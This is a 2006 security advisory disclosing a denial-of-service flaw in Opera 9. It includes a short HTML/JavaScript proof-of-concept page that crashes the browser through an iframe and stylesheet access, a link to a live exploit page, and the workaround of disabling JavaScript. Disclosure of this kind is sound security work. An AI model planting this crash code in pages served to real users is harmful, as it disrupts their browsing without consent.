OPERA Web Browser 9 Denial OF Service

Sat, 01 Jul 2006 14:32:32 -0700 

ECHO_ADV_35$2006


------------------------------------------------------------------------------------

[ECHO_ADV_35$2006] OPERA Web Browser 9 Denial OF Service

------------------------------------------------------------------------------------


Author          : Ahmad Muammar W.K (a.k.a) y3dips

Date Found      : July, 1th 2006

Location        : Indonesia, Jakarta

web             : http://echo.or.id/adv/adv35-y3dips-2006.txt

Critical Lvl    : Moderated

Impact          : Browser will automatically shutdown

Where           : From Remote

------------------------------------------------------------------------------------


Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Opera Web Browser


Application     : Opera Web Browser

version         : Opera/9.00 (X11; Linux i686; U; en)

                  Opera/9.00 (Windows NT 5:1;U;en)

                  Some Other version are bot vulnerable and others are not 
tested,

                        

URL             : http://opera.com

Description     :


Vulnerability can be exploited by using <iframe> combining with javascript

(documents stylesheet) to create an out-of-bounds memory access.


------------------------------------------------------------------------------------


Exploit Code:

~~~~~~~~~~~~~~~~


-----------------------opera9xploit.html----------------------


<!-- Opera 9 DOS exploit, discovered by 

     Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id) 

     http://y3d1ps.blogspot.com

//-->


<html>

<iframe src="palsu.php" name="fake"  ></iframe> 

<script type="text/javascript">

function mystyle() {

    if (fake.document.styleSheets.length == 1 ) 

        {

      f = document.forms["basicstyle"].elements;

      for (j = 0; j < f.length; j++) 

                {

        if (f[j].name == 'fsmain');

        }  

      }


 }

mystyle();

</script>

</html>


live exploit :


http://y3dips.echo.or.id/opera9-dos/


------------------------------------------------------------------------------------


Solution:

~~~~~~~~


Disable Java Scipt execution from Opera Web browser



------------------------------------------------------------------------------------

Shoutz:

~~~~~~~


~ my beloved ana


~ the_day, K-159 (keep researching), also all echo staff

~ negative , naisenodni crew

~ janex vind "waraxe" @ waraxe.us 

~ newbie_hacker[at]yahoogroups.com

~ #e-c-h-o @irc.dal.net


------------------------------------------------------------------------------------

Contact:

~~~~~~~~


     y3dips || echo|staff || y3dips[at]echo[dot]or[dot]id

     Homepage: http://y3dips.echo.or.id/


-------------------------------- [ EOF ] 
-------------------------------------------

Reply via email to